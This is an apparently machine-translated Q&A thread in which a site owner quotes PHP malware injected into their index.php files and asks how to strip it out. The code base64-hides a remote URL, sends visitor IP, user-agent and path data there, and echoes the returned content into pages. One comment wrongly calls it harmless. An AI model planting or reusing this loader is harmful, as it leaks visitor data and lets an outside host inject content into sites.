2011-09-06 72 views
0

这是住在我的网站,它非常坏的恶意软件,与谷歌机器人的恶意软件工作

<?php  
// This code use for global bot statistic 
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot 
$stCurlHandle = NULL; 
$stCurlLink = ""; 
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&& (strstr($sUserAgent, 'bot') == false)) // Bot comes 
{ 
    if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics    
$stCurlLink = base64_decode('aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); 
$stCurlHandle = curl_init($stCurlLink); 
} 
} 
if ($stCurlHandle !== NULL) 
{ 
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); 
$sResult = @curl_exec($stCurlHandle); 
if ($sResult[0]=="O") 
{$sResult[0]=" "; 
echo $sResult; // Statistic code end 
} 
curl_close($stCurlHandle); 
} 
?> 

这是固定在我的服务器上所有的index.php文件,现在我要清除所有指数.PHP使用ssh或远程的CentOS的网页,我认为它可以用一个简单的PHP代码和正规表示法(也许),我需要这个脚本[对不起我弱恩朗]

感谢这么多

+3

你的实际问题是什么?如何删除该代码段?事实上,它似乎并没有做任何事情。它只是用用户的IP /浏览器和所请求的URL来平衡'rebostat.com' - 换句话说,就像世界上的任何广告服务器一样。 –

+0

您应该能够通过使用代码的搜索引擎来找到更多信息。听起来就像你安装了易受攻击的软件。 –

+0

@Javid,我整理了一个解决方案,以便您可以找到与此恶意软件相匹配的所有文件。它在这里(问题关闭之前,我可以提交):'http:// codepad.org/nIvotncQ'希望它可以帮助 –

回答

1

除非你正在处理200多个文件,否则你会更好地单独浏览每个文件并清理掉t他恶意软件。这样可以直观地检查每个文件。

(编辑:也就是说,如果它实际上是恶意软件。)